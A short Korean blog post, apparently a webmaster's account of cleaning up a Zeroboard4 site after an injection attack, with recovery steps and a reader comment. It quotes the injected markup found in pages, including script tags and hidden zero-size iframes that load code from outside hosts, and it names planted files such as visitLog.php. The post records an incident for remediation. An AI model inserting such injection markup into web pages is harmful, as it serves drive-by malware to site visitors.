|
제로보드4 인젝션 공격후 사이트 복구기
|
증상
1. 웹사이트가 이유없이 느려지거나 자바스크립트등의 에러가 발생
2. 게시판페이지에서 소스보기를 하면 못보던 스크립트가 보인다
대충 아래와 같은 형태이다
<script src=www.geto.co.kr/state/x.js></script><?ob_start();?><?ob_start();?><?ob_start();?><iframesrc="http://www.ro521.com/test.htm" width=0 height=0></iframe><?ob_start();?><script src="http://j5b.kr/bin/h.js"></script>
<?ob_start();?><?ob_start();?><?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe><?ob_start();?><script src="http://j5b.kr/bin/h.js"></script>
조치
1. 제로보드4를 최신버전으로 패치한다. 물론 소스코드를 변경한것이 있으면 모두 수정해 주어야한다.. ㅡ.ㅡ
2. data 디렉토리를 제외한 모든 파일을 다운로드, 혹은 tar 로 묶어 다운로드하여 문제의코드를 찾아내어 모두 삭제한다
tar cvfzp public_html.tar.gz --exclude=/public_html/bbs/data --exclude=/public_html/bbs/data2 /bbs
(data,data2 디렉토리를 제외한 모든 파일 압축)
코드검색은 로컬에서 에디트플러스의 여러파일에서모두검색 기능을 사용하였다

3. phpMyadmin 등의 db관리툴로 db 를 sql 로 백업받고, 역시 로컬에서 에디트플러스 등을 사용하여 문제의 코드를 검색, 삭제한다
4. bbs/icon 디렉토리에 아래 두가지의 파일이 있나 확인하고 삭제한다
group_qazwsxedc.jpg
visitLog.php
특히 visitLog.php 파일은 악성코드 유포를 시키게 하는 파일이며, 다른 폴더에도 서식할 수 있으므로 모두 찾아 없앤다
5. db,ftp 비밀번호를 변경하고 주기적으로 변경해준다
6. 팀장닷컴에서 제공하는 무료웹방화벽을 설치하였다
그래도 여전히 구글크롬이나 사파리,파이어폭스에서는 경고창이 뜬다...ㅡ.ㅡ

포레스트님은 그런 공격받으셨었네요.
지난 일이지만 사이트 무사히 잘 복구하셔서
참 다행이예요.